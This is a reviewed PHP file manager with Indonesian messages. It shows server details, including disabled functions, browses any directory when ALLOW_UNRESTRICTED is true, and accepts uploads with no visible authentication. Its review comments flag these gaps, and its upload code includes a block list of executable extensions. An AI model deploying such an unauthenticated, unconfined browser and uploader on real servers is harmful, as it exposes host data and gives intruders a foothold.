// === SECURITY CONFIGURATION ===
// BASE_DIR is the directory used when no (or no usable) `dir` parameter is given, and
// the sandbox root applied by resolve_directory() when ALLOW_UNRESTRICTED is false.
define('BASE_DIR', __DIR__);
// NOTE(review): with this set to true, resolve_directory() returns any path that
// realpath() can resolve, so browsing and uploading are not confined to BASE_DIR.
define('ALLOW_UNRESTRICTED', true);

// Diagnostics are neither reported nor rendered into the page.
// NOTE(review): error_reporting(0) turns reporting off for every error level, so
// failures in the code below are not surfaced anywhere by PHP itself.
ini_set('display_errors', 0);
error_reporting(0);
// === UTIL ===
/**
 * Rewrite both slash styles in a path to the platform's directory separator.
 *
 * @param string $p Path that may mix "/" and "\".
 * @return string The same path with every slash replaced by DIRECTORY_SEPARATOR.
 */
function normalise_slashes($p) {
    $slashStyles = ['/', '\\'];
    $converted = str_replace($slashStyles, DIRECTORY_SEPARATOR, $p);
    return $converted;
}
/**
 * Turn a filesystem path into its forward-slash form for use in a URL.
 *
 * Only the separator is changed; the result is not URL-encoded.
 *
 * @param string $p Path using DIRECTORY_SEPARATOR.
 * @return string The path with each DIRECTORY_SEPARATOR replaced by "/".
 */
function rel_for_url($p) {
    $urlSeparator = '/';
    return str_replace(DIRECTORY_SEPARATOR, $urlSeparator, $p);
}
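/**
 * Resolve a requested directory (taken from the request) to a filesystem path.
 *
 * When ALLOW_UNRESTRICTED is true the request is resolved as given and nothing confines
 * it to BASE_DIR. When it is false the request is resolved relative to BASE_DIR and the
 * result is accepted only if it is BASE_DIR itself or lies beneath it.
 *
 * @param mixed $requested Raw value of the `dir` parameter; treated as untrusted.
 * @return string|false Resolved path. The resolved BASE_DIR is returned for an empty,
 *                      array-valued or (in sandbox mode) out-of-bounds request. In
 *                      unrestricted mode an unresolvable request is returned as given,
 *                      so the caller still has to check it with is_dir().
 */
function resolve_directory($requested) {
    $baseReal = realpath(BASE_DIR);

    // ?dir[]=x arrives as an array; it can never name a directory.
    if (is_array($requested)) return $baseReal;

    // Trim whitespace and NUL only; slashes are part of the path and must stay.
    $requested = trim((string)$requested, " \t\n\r\0\x0B");
    if ($requested === '') return $baseReal;

    if (ALLOW_UNRESTRICTED) {
        $real = realpath($requested);
        return $real ? $real : $requested;
    }

    // Without a resolvable base there is nothing to compare against, so fail closed
    // instead of comparing against an empty prefix that every path would match.
    if ($baseReal === false) return BASE_DIR;

    $real = realpath($baseReal . DIRECTORY_SEPARATOR . $requested);
    if ($real === false) return $baseReal;
    if ($real === $baseReal) return $real;

    // Compare against "base + separator": a bare string-prefix test would also accept
    // a sibling whose name merely starts with the base name (base "/srv/app" versus
    // "/srv/app-old").
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) === 0) return $real;

    return $baseReal;
}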
// === INIT ===
// The working directory comes from the `dir` query parameter, which is
// request-controlled; resolve_directory() decides whether it is confined to BASE_DIR.
$directory = BASE_DIR;
if (isset($_GET['dir'])) {
    $directory = resolve_directory($_GET['dir']);
}
// Anything that is not an existing directory falls back to BASE_DIR.
if (!is_dir($directory)) {
    $directory = BASE_DIR;
}
// === SERVER INFO ===
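// Label => value pairs printed in the "Server Info" table.
// NOTE(review): these values (addresses, PHP version, disabled functions, limits) are
// shown to whoever can load the page, and no access check is visible in this file.
$server_info = [
    // NOTE(review): fixed string literal, not a value read from the host. The listing
    // shows it without quotes, which is a parse error, so it is quoted here.
    "OS" => "Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64",
    // Falls back to resolving the local hostname when SERVER_ADDR is not set.
    "Server IP" => $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname()),
    "Client IP" => $_SERVER['REMOTE_ADDR'] ?? "Unknown",
    "PHP Version" => phpversion(),
    "Server Software" => $_SERVER['SERVER_SOFTWARE'] ?? "Unknown",
    // get_current_user() reports the owner of the running script, which is not
    // necessarily the account the PHP process runs as.
    "Current User" => get_current_user(),
    "Disable Functions" => ini_get("disable_functions") ?: "None",
    "Memory Limit" => ini_get("memory_limit"),
    "Max Upload" => ini_get("upload_max_filesize"),
    "Post Max Size" => ini_get("post_max_size"),
];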
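// === NOTIFICATION MESSAGES ===
// Each entry is ['ok' => text] or ['err' => text]. Text is stored raw and is
// HTML-escaped once, where the page prints it; escaping here as well would
// double-encode it.
$messages = [];

// === UPLOAD HANDLER ===
// Stores the files posted as `files` (single or `files[]`) in $directory.
// NOTE(review): nothing visible in this file authenticates the caller or verifies a
// CSRF token, and $directory is chosen by the request. The name check below is a
// stopgap, not a complete control: an upload endpoint like this should sit behind
// authentication and write to a location the web server never executes.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['action']) && $_POST['action'] === 'upload' && isset($_FILES['files'])) {
    if (!is_dir($directory) || !is_writable($directory)) {
        $messages[] = ['err' => "Direktori tidak writable: " . $directory];
    } else {
        $files = $_FILES['files'];
        // PHP delivers parallel arrays for `files[]` and scalars for a single field.
        $multi = is_array($files['name']);
        $count = $multi ? count($files['name']) : 1;
        $targetDir = rtrim($directory, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        // Name segments that a web server commonly hands to an interpreter.
        $blocked = '/\.(?:php\d*|phtml|pht|phps|phar|cgi|pl|py|sh|asp|aspx|jsp|shtml)(?:\.|$)/i';

        for ($i = 0; $i < $count; $i++) {
            $name = $multi ? $files['name'][$i] : $files['name'];
            $tmp = $multi ? $files['tmp_name'][$i] : $files['tmp_name'];
            $err = $multi ? $files['error'][$i] : $files['error'];

            // basename() drops any client-supplied directory part; every character
            // outside the allowed set becomes "_".
            $orig = basename($name);
            $safe = preg_replace('/[^A-Za-z0-9_\-\. ]/', '_', $orig);

            if ($err !== UPLOAD_ERR_OK) {
                $messages[] = ['err' => "Gagal upload $orig (err:$err)"];
                continue;
            }
            if (!is_uploaded_file($tmp)) {
                $messages[] = ['err' => "File tmp hilang: $orig"];
                continue;
            }

            // Refuse dotfiles (per-directory server configuration) and names carrying
            // an executable extension in any segment. Trailing dots and spaces are
            // ignored for the check because some filesystems drop them on write.
            $probe = rtrim($safe, ' .');
            if ($probe === '' || $probe[0] === '.' || preg_match($blocked, $probe)) {
                $messages[] = ['err' => "Tipe file tidak diizinkan: $orig"];
                continue;
            }

            // Never overwrite an existing file: prefix a unique id instead.
            $dest = $targetDir . $safe;
            if (file_exists($dest)) {
                $dest = $targetDir . uniqid() . '_' . $safe;
            }

            if (move_uploaded_file($tmp, $dest)) {
                $messages[] = ['ok' => "Uploaded: $safe"];
            } else {
                $messages[] = ['err' => "Gagal memindahkan $orig ke $dest"];
            }
        }
    }
}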
// === READ FOLDER CONTENTS ===
// List $directory without "." and ".."; an unreadable directory yields an empty list
// (the scandir() warning is suppressed).
$files = array_diff(@scandir($directory) ?: [], ['.', '..']);

// Directories are listed first, then everything else, each group in scandir() order.
$dirs = [];
$regular = [];
foreach ($files as $f) {
    $p = $directory . DIRECTORY_SEPARATOR . $f;
    if (is_dir($p)) {
        $dirs[] = $f;
    } else {
        $regular[] = $f;
    }
}
$sorted = array_merge($dirs, $regular);
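// === BREADCRUMB ===
// Build one crumb per path segment of $directory; each crumb carries the display
// name and the cumulative path up to that segment.
$parts = explode(DIRECTORY_SEPARATOR, $directory);
$crumbs = [];
$path_accum = '';
foreach ($parts as $index => $part) {
    if ($part === '') {
        // Only the leading empty segment stands for the filesystem root. An empty
        // segment later on (the root directory itself splits into two of them) would
        // otherwise reset the accumulated path and add a second "/" crumb.
        if ($index === 0) {
            $path_accum = DIRECTORY_SEPARATOR;
            $crumbs[] = ['name' => '/', 'path' => $path_accum];
        }
        continue;
    }
    // rtrim() keeps the root from producing a doubled separator.
    $path_accum = rtrim($path_accum, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $part;
    $crumbs[] = ['name' => $part, 'path' => $path_accum];
}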
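/*
 * === PAGE TEMPLATE ===
 * HTML with embedded PHP. Every value that comes from the filesystem, the request or
 * the server configuration is HTML-escaped in text context and URL-encoded inside
 * href attributes at the point of output.
 *
 * NOTE(review): the listing shows the embedded statements without PHP open/close tags
 * and the table rows as pipe-separated text; both are restored here. The markup of the
 * upload form is not visible in the listing and is left as found rather than guessed.
 */
?>
<!DOCTYPE html>
<meta charset="UTF-8">
File Manager<title>File Manager</title>
<style>
body{font-family:monospace;background:#111;color:#eee;}
a{color:#1abc9c;text-decoration:none;}
a:hover{text-decoration:underline;}
.box{background:#222;padding:6px;margin:4px 0;border-radius:4px;}
.msg-ok{background:#2d7;color:#fff;padding:4px;margin:3px 0;}
.msg-err{background:#c33;color:#fff;padding:4px;margin:3px 0;}
.breadcrumb a{color:#f39c12;margin-right:5px;}
</style>
Server Info
<table border="1" cellpadding="4" cellspacing="0">
<?php foreach($server_info as $k=>$v): ?>
<tr><td><?php echo htmlspecialchars($k); ?></td><td><?php echo htmlspecialchars($v); ?></td></tr>
<?php endforeach; ?>
</table>
Directory:
<div class="breadcrumb">
<?php foreach($crumbs as $c): ?>
<a href="?dir=<?php echo urlencode($c['path']); ?>"><?php echo htmlspecialchars($c['name']); ?></a> /
<?php endforeach; ?>
</div>
<?php foreach($messages as $m): ?>
<div class="<?php echo isset($m['ok'])?'msg-ok':'msg-err'; ?>">
<?php echo htmlspecialchars(reset($m)); ?>
</div>
<?php endforeach; ?>
<ul>
<?php foreach($sorted as $f): ?>
<li>
<?php
// Entry names come from the filesystem and may contain markup characters or bytes
// that are not valid UTF-8, so they are escaped before being printed; ENT_SUBSTITUTE
// keeps such a name visible instead of turning it into an empty string.
$label = htmlspecialchars($f, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
?>
<?php if(is_dir($directory.DIRECTORY_SEPARATOR.$f)): ?>
📁 <a href="?dir=<?php echo urlencode($directory.DIRECTORY_SEPARATOR.$f); ?>"><?php echo $label; ?></a>
<?php else: ?>
📄 <?php echo $label; ?>
<?php endif; ?>
</li>
<?php endforeach; ?>
</ul>
<div class="box">
Upload Files
</div>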